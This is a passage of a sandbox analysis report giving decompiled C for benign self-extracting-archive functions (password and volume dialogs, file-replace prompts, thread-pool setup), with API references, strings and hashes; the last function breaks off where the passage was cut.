Opcode Fuzzy Hash: 1bcb7aa72496595bf7462f6ad45cb3f935f5c1d06ace004b8351bc1411694a66
Instruction Fuzzy Hash: 88318F71D4C248AEDF20EF68DC55BFEBBE8EB16354F0440A6F845A7292DBB04944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA3B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00BBA3B0(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00BA130B(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xbffca8 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xbffca8), ( *0xbffca8)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E00BABBC5(__eflags,  *( *0xbffca8));
					_t22 = E00BA10F0(_t30, E00BADD11(_t25, 0x8e),  *( *0xbffca8), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xbffca8));
					goto L13;
				}
				goto L6;
			}

0x00bba3b1
0x00bba3b6
0x00bba3bb
0x00bba3c0
0x00bba3d8
0x00bba468
0x00bba46a
0x00000000
0x00bba46a
0x00bba3de
0x00bba3e4
0x00bba457
0x00bba459
0x00bba45f
0x00bba462
0x00000000
0x00bba462
0x00bba3e9
0x00bba3fd
0x00000000
0x00bba3fd
0x00bba3ee
0x00bba3f1
0x00bba44d
0x00bba453
0x00bba437
0x00bba438
0x00000000
0x00bba438
0x00bba3f3
0x00bba3f6
0x00bba435
0x00000000
0x00bba435
0x00bba3fb
0x00bba40a
0x00bba423
0x00bba428
0x00bba42a
0x00000000
0x00000000
0x00bba431
0x00000000
0x00bba431
0x00000000

APIs

Part of subcall function 00BA130B: GetDlgItem.USER32(00000000,00003021), ref: 00BA134F
Part of subcall function 00BA130B: SetWindowTextW.USER32(00000000,00BD25B4), ref: 00BA1365

EndDialog.USER32(?,00000001), ref: 00BBA438
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BBA44D
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BBA462

Strings

ASKNEXTVOL, xrefs: 00BBA3C8

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: b6b418d721178d6c5c75c7c01915eceb46b4061f63c43d3896d41697dd05d7c4
Instruction ID: eae4bbb90907b5ce35e91c5d7f099319b813305ec150f89f5e1465e2e905ba5e
Opcode Fuzzy Hash: b6b418d721178d6c5c75c7c01915eceb46b4061f63c43d3896d41697dd05d7c4
Instruction Fuzzy Hash: 6A11D332A44210BFD6119F6CDC4DFBAB7E8EF4BB40F0004A1F640972A1CAE2A845D727

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD103 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BAD103(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00BB14F2( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E00BAFD3B(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E00BADCAB();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x850df8
					_t30 = E00BC5739(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E00BACF20);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0xbdd158 +  *_t30 * 0xc; // 0xbd36b8
						E00BC5DA0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}

0x00bad103
0x00bad103
0x00bad103
0x00bad104
0x00bad108
0x00bad10f
0x00bad115
0x00bad125
0x00bad12b
0x00bad12f
0x00bad132
0x00bad13d
0x00bad13d
0x00bad145
0x00bad148
0x00bad183
0x00bad14a
0x00bad14a
0x00bad14d
0x00bad162
0x00bad163
0x00000000
0x00bad14f
0x00bad152
0x00bad157
0x00bad158
0x00bad168
0x00bad16b
0x00bad16d
0x00bad16e
0x00bad173
0x00bad173
0x00bad152
0x00bad14d
0x00bad18f
0x00bad195
0x00bad199
0x00bad1a3
0x00000000
0x00bad1a9
0x00bad1af
0x00bad1b8
0x00bad1c0
0x00bad1c0
0x00bad117
0x00bad117
0x00bad117
0x00bad117
0x00bad1c7

APIs

__fprintf_l.LIBCMT ref: 00BAD16E
_strncpy.LIBCMT ref: 00BAD1B8

Strings

$%s, xrefs: 00BAD163
@%s, xrefs: 00BAD158

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 618594fb7c8420919a45d74c66626e173799059576ab0bf5352460cf91a1ec6b
Instruction ID: bf546b10235176e4d12365461d9ab4c10be8a4777c7526230173e61e93f1cba8
Opcode Fuzzy Hash: 618594fb7c8420919a45d74c66626e173799059576ab0bf5352460cf91a1ec6b
Instruction Fuzzy Hash: 0221C072504348AEDF20DFA4CC46FEE7BE8EB06300F4004A6FA01A66A2E375DA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA8E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00BBA8E0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00BA130B(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00BAEBED(_t24, 0xbf5a70,  &_v260);
					E00BAEC38( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00bba8ea
0x00bba8ee
0x00bba8f2
0x00bba90b
0x00bba97a
0x00000000
0x00bba97c
0x00bba90d
0x00bba913
0x00bba974
0x00000000
0x00bba974
0x00bba918
0x00bba927
0x00000000
0x00bba927
0x00bba91d
0x00bba920
0x00bba946
0x00bba958
0x00bba965
0x00bba96a
0x00bba92d
0x00bba92e
0x00000000
0x00bba92e
0x00bba925
0x00bba92b
0x00000000
0x00bba92b
0x00000000

APIs

Part of subcall function 00BA130B: GetDlgItem.USER32(00000000,00003021), ref: 00BA134F
Part of subcall function 00BA130B: SetWindowTextW.USER32(00000000,00BD25B4), ref: 00BA1365

EndDialog.USER32(?,00000001), ref: 00BBA92E
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BBA946
SetDlgItemTextW.USER32(?,00000067,?), ref: 00BBA974

Strings

GETPASSWORD1, xrefs: 00BBA8F9

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: d3cdf4b2adee606a6c1a33c039addf91b2e2b50fcee64ad97eed534e7728cd9e
Instruction ID: 04aadbe62e4fa08a10eb7cd68f6004b98d6f761b00e3a9c4673bce6898d9be63
Opcode Fuzzy Hash: d3cdf4b2adee606a6c1a33c039addf91b2e2b50fcee64ad97eed534e7728cd9e
Instruction Fuzzy Hash: 5E11E932D4411877DB215A649D49FFB77FCEB49710F010091FA85A2080C2A1D950A672

Uniqueness

Uniqueness Score: -1.00%

Function 00BAB437 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00BAB437(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E00BAB746(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00BC1438(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00BC1438(_t23);
							if(_t13 == 0) {
								_t14 = E00BC33F3(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00BC56A2(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E00BA3FD6(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}

0x00bab438
0x00bab43f
0x00bab444
0x00bab447
0x00bab44e
0x00bab46b
0x00bab46f
0x00bab47a
0x00bab47b
0x00bab47c
0x00bab482
0x00bab485
0x00bab48a
0x00bab48b
0x00bab48c
0x00bab495
0x00bab49f
0x00bab497
0x00bab49b
0x00bab49b
0x00bab4a9
0x00bab4ab
0x00bab4b0
0x00bab4b8
0x00bab4ba
0x00bab4ba
0x00bab485
0x00000000
0x00bab4be
0x00000000

APIs

_swprintf.LIBCMT ref: 00BAB45E

Part of subcall function 00BA3FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA3FE9

_wcschr.LIBVCRUNTIME ref: 00BAB47C
_wcschr.LIBVCRUNTIME ref: 00BAB48C

Strings

%c:\, xrefs: 00BAB454

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 3a3ff62bac0afa31f889f407eedcdf38ddc6e36f6a606a63188dd29a42276d9e
Instruction ID: 4a1e78e8b8d6ba4bf2f1896bf6c1676b94c1191d5dde2c3b515b4791b65a4bda
Opcode Fuzzy Hash: 3a3ff62bac0afa31f889f407eedcdf38ddc6e36f6a606a63188dd29a42276d9e
Instruction Fuzzy Hash: E401F96350831169D7306B658C86D6BB7ECEE9B770B90889AF954C6683FF34D850C3B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0618 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00BB0618(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xbdff50);
					E00BA6E21(E00BA6E26(_t19), 0xbdff50, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x00bb0618
0x00bb0618
0x00bb0620
0x00bb0624
0x00bb0625
0x00bb0629
0x00bb062b
0x00bb062b
0x00bb0634
0x00bb0636
0x00bb0636
0x00bb0638
0x00bb0640
0x00bb0642
0x00bb0642
0x00bb0644
0x00bb064a
0x00bb0651
0x00bb0665
0x00bb066b
0x00bb0671
0x00bb067d
0x00bb0683
0x00bb068d
0x00bb0699
0x00bb0699
0x00bb069f
0x00bb06a7
0x00bb06ad
0x00bb06b6

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00BAAB05,00000008,?,00000000,?,00BACAC8,?,00000000), ref: 00BB0651
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00BAAB05,00000008,?,00000000,?,00BACAC8,?,00000000), ref: 00BB065B
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BAAB05,00000008,?,00000000,?,00BACAC8,?,00000000), ref: 00BB066B

Strings

Thread pool initialization failed., xrefs: 00BB0683

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 75a6526c640143393fd9ba990be933b1ff7c6ae1c7c2fbdc8fb69404aa10d603
Instruction ID: ca33b7f0bc3b6ded85b3620474b09486a54e70f9cd8c32a9b0ed0755b3e11830
Opcode Fuzzy Hash: 75a6526c640143393fd9ba990be933b1ff7c6ae1c7c2fbdc8fb69404aa10d603
Instruction Fuzzy Hash: 941151B15057099FC3215F65DC84AB7FBECEBA9754F10486EE1DA86200DAB11980CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD1E1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BBD1E1(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t16;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0xbfcc80 = _a12;
				 *0xbfcc84 = _a16;
				 *0xbe7464 = _a20;
				if( *0xbe7443 == 0) {
					if( *0xbe7442 == 0) {
						_t19 = E00BBB820;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xbdfed4, _t16,  *0xbe7438, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xbdfed0, L"RENAMEDLG",  *0xbe7448, E00BBCB10, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x00bbd1ee
0x00bbd1f6
0x00bbd1fe
0x00bbd203
0x00bbd210
0x00bbd21a
0x00bbd21f
0x00bbd249
0x00bbd260
0x00bbd265
0x00000000
0x00000000
0x00bbd247
0x00000000
0x00000000
0x00bbd247
0x00000000
0x00bbd26b
0x00000000
0x00bbd214
0x00000000

Strings

RENAMEDLG, xrefs: 00BBD234
REPLACEFILEDLG, xrefs: 00BBD21F, 00BBD253

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: aab4b21dcdaa6e0bb1237258cacbbfd60ab13fc510729bb0f1bc4c22ca9d685a
Instruction ID: 36560182dc8ae42934b8df3930e9308bf6e68e9f7c49e33bd1898bd7f505f54b
Opcode Fuzzy Hash: aab4b21dcdaa6e0bb1237258cacbbfd60ab13fc510729bb0f1bc4c22ca9d685a
Instruction Fuzzy Hash: 5C015271A48288BFCB119F64ED85ABA7FF8E704751B040466F90987371FAB5CC90E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD104 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00BBD104(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E00BBE1C0();
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t7 = E00BAFB18(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E00BAFC31() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12);
				}
				return _t7;
			}

0x00bbd104
0x00bbd10c
0x00bbd11a
0x00bbd12f
0x00bbd134
0x00bbd138
0x00bbd13d
0x00bbd147
0x00bbd140
0x00bbd140
0x00bbd146
0x00bbd146
0x00bbd156
0x00bbd156
0x00bbd160

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00BBD11A
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00BBD156

Strings

sfxpar, xrefs: 00BBD151
sfxcmd, xrefs: 00BBD115

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: c7c10ef0fec40ee980e636484ad6cbce397d112b866fc9ad2bb30f84a1d5bc39
Instruction ID: f353bd77040d7ea935a54cec1e35f54d3a5f63e39a84a1a8fdfa1c845d2d62f6
Opcode Fuzzy Hash: c7c10ef0fec40ee980e636484ad6cbce397d112b866fc9ad2bb30f84a1d5bc39
Instruction Fuzzy Hash: 04F08271805228A7C7202FD5DC09AFABBECDF15741B0040E6FD45A6251FAB58840DAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC905E Relevance: 6.3, APIs: 4, Instructions: 305
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00BC905E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00BC3C16(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00BBE340( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
